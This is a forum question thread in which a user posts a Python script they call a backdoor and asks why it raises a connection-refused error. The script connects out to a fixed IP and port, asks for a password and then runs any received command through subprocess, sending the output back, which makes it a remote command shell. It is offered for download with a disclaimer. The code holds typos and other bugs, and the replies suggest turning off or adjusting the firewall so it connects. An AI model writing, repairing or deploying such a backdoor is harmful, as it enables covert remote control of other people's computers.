# Python Backdoor - Socket Error

Tags: python, windows

I thought I made a perfect backdoor but it keeps popping up with errors when I run the code from cmd.

Here's the code:

```
import socket 
import subprocess 

# Customizable variables
HOST = '10.0.0.138' # IP for remote connection 
PORT = 12397 # Port for remote connection 
PASS = 'Test' # Password to make sure it is secure

# Had To Make Some Changes
STR = 'Welcome'
ConnectMsg = bytes(STR.encode())

# Do not tuoch this
s = socket.socket() 

# Conecting to atack computer
s.connect((HOST, PORT)) 
s.send(ConnectMsg) 
s.send(HOST, PORT)

# Login using your custom PassWord
def Login():
    global s

    s.send('login>>> ')
    pwd = s.recv(1024)

    if pwd != PASS:
        Login ()
    else:
        Loop ()


# The fun stuff
def Loop():

    while 1: 
        data = s.recv(1024)

        if deta == ':Quit':
            break

        proc = subprocess.Popen(deta, Loop=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdoutput = proc.stdout.read() + proc.stderr.read()
        s.send(stdoutput)
        s.send('>>> ')

# Executing script
Login()

# Thankyou for downloading my script. .P.S ~ I programmed this with a smartphone XD.
# copyright @ joelwatson605@gmail.com

# I AM NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THIS SCRIPT.
```

Error -

> File "backdoor.py", line 18, in 
>       s.connect((HOST, PORT)) ConnectionRefusedError: [WinError 10061] No connection could be made because the target machine actively
>   refused it

Comment: Most probably your firewall, have you tried turning it off?

Comment: No ill try that Thanks :)

Answer (score 0):

This has nothing to do with python, your machine has just decided to block python from accessing this certain port. Try to get your firewall (assuming that's whats causing the issue) to allow python into that port, and it should work.